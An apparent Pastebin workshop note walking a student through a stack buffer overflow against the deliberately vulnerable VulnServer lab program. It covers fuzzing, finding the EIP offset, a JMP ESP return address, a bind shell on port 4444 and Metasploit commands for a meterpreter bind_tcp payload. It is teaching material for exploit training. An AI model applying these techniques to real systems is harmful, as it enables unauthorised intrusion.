Advertisement
joemccray

Quick Stack Based Buffer Overflow For Tim

Oct 28th, 2015
1,306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.63 KB | None | 0 0
  1. #############################################
  2. # Quick Stack Based Buffer Overflow For Tim #
  3. #############################################
  4.  
  5. - You can download everything you need for this exercise (except netcat) from the link below
  6. https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
  7.  
  8. - Extract this zip file to your Desktop
  9.  
  10. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  11.  
  12. - Open a new command prompt and type:
  13. nc localhost 9999
  14.  
  15. - In the new command prompt window where you ran nc type:
  16. HELP
  17.  
  18. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  19. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  20.  
  21. - Now double-click on 1-simplefuzzer.py
  22. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  23.  
  24.  
  25. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  26.  
  27. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  28.  
  29. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  30.  
  31. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  32.  
  33. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  34.  
  35. - Calculate the distance to EIP by running script 3-3000chars.py
  36. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  37.  
  38. 4-count-chars-to-EIP.py
  39. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  40. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  41.  
  42. 5-2006char-eip-check.py
  43. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  44.  
  45. 6-jmp-esp.py
  46. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  47.  
  48. 7-first-exploit
  49. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  50.  
  51. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  52.  
  53.  
  54. ------------------------------
  55.  
  56. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  57.  
  58. vi vulnserv.rb (paste the code into this file)
  59.  
  60.  
  61.  
  62. cd ~/toolz/metasploit
  63.  
  64. ./msfconsole
  65.  
  66.  
  67.  
  68. use exploit/windows/misc/vulnserv
  69. set PAYLOAD windows/meterpreter/bind_tcp
  70. set RHOST 192.168.88.129
  71. set RPORT 9999
  72. exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement